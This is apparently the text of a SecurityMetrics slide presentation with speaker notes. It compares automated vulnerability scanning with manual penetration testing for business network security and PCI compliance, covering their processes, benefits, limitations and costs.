For more info on pen testing: securitymetrics.com/sm/pub/penetrationtesting
For more info on vulnerability scanning: securitymetrics.com/sm/pub/vulnerabilityscanning
Even the most experienced administrators may fail to implement the latest secure practices at your business. The easiest and most accurate ways to discover if your business is secure enough to withstand a hack is to test it through the eyes of a hacker. An ethical hacker is simply a computer bodyguard that manually examines a business environment for weaknesses via a penetration test, and determines which weaknesses he can exploit. Discover how penetration testers search for vulnerabilities by using the latest hacking techniques, and learn how to baton down your organizational hatches with penetration testing and vulnerability scanning.
2. About Us
> Assisted >1 million merchants
> Largest PCI support staff worldwide
> Certified as ASV, PFI, QSA, PA QSA
> Member of PCI Security Standard Council
task forces and special interest groups
> Performs on-site auditing, forensic
investigations, penetration testing,
vulnerability scanning, security consulting,
PCI compliance
> Offers network security devices, data
discovery software
3. Testing Network Security
• 93 % of large organisations and 76% of small
businesses experienced a security breach in 2011
(Information Security Breaches Survey, 2012)
• Compromise costs
• Financial penalties
• Average organisational cost $5.5 million
(Ponemon Institute, 2012)
• Significant loss of reputation/brand trust
• Various ways to test network security
– Vulnerability scan (most thorough)
– Penetration test
– Anti-virus/malware software
– Appliances (Intrusion Prevention Systems)
– Spyware
4. Vulnerability Scan (VA scan)
An automated, high-level test
Process
• Should be conducted by a company with accreditation
• Identifies network weaknesses (i.e., PCI SSC Approved Scanning Vendor)
and ranks how critical they are • Automatic network scans on a quarterly basis
• Gives a beginning look at what • Report of weaknesses, false positives
possibly could be exploited • Weaknesses patched on a prioritised basis
• Good VA scan searches for over 50,000 vulnerabilities
Benefits
• Quick high-level look at possible vulnerabilities
• Very affordable
• Automatic
• Takes a matter of minutes
Limitations
• Sometimes test falsely classifies object as a
vulnerability (false positive)
Internal • Manually check each vulnerability before testing again
5. Penetration Test
An exhaustive, live examination
Process
• Live attempt to exploit • Run automatic vulnerability scan
vulnerabilities • Follow up on reported vulnerabilities
• Analyst takes on “hacker” role • Prove the vulnerability can be exploited
• Try to fake passwords, manipulate • Internal and external testing
code, fool web servers into giving •External- perspective of an hacker over Internet
sensitive information •Internal- perspective of someone within network
• Report findings and recommendations per target
Benefits
• More accurate, thorough than VA scan
• Manual: Live analyst reviews the logic of the
application and determines how to leverage access
• Rules out false positives
Limitations
• Time (1 day to 3 weeks)
• Cost
6. Comparison
Vulnerability Scan Penetration Test
• Automated • Manual (main difference)
• Minutes • Days
• Scheduled • Annually (after significant change)
• Passive • Aggressive
• Report false positives • Rules out false positives
• Programmed • Intuitive
• Identical scans • Accurate/thorough
• N/A • Exploitation
Both tests work together to encourage optimal network security
7. Conclusion
• Computer intrusion was responsible for 83% of the total
reported exposed records in 2011 and 1/3 total
breaches.
– Data Breach Intelligence Report, 2012
“History has taught us: never underestimate
the amount of money, time, and effort
someone will expend to thwart a security
system. It's always better to assume the
worst…Give yourself a margin for error. Give
yourself more security than you need today.
When the unexpected happens, you'll be
glad you did.”
-Bruce Schneier: cryptographer, security expert
Editor's Notes
Presentation Description: What is expected of vendor's network security? How do you ensure your company is meeting essential security requirements? With payments security expert Gary Glover, attendees will explore the benefits, limitations, processes, and business relevancy of vulnerability scanning and penetration testing.
How do you figure out if you’re safe?What is expected?If data is compromised, ignorance will not be an effective excuseEven if you might not deal with critical data yourself, essential to check all environmentsVA and Penetration testing are the most thorough
Cost- average pen test is $5-10k and a vulnerability scan is only a couple hundred bucks.Another benefit: If you have a ton of networks set up exactly the same, you can just sample a few instead of paying to test them all (VA scan is required to test them all)
Manual test- main difference between VA scanning and pen testing. Ruling out false positives- Automated scan is only as good as the code. Pen tester can manually prove false positives. Thoroughness- all automated tools struggle with automation. A real person can completely review the target scope. Exploitation- if an analyst finds it, they can determine the inherent risk with the issue at that time.Most automated scans can’t authenticate. They’re from an external perspective. Not usually given login credentials to authenticate to look in internal applications. Talk about how these two work together!!!!!! They need both!
-Network security testing required for Payment Card Industry Data Security Standard compliance-Database exploitation: Pen testers are able to obtain full credit card data, full customer contact info, trade secrets, social security numbers within a matter of daysIn 90% of cases, where SQL injection is present, SecurityMetrics penetration testers can get inside the database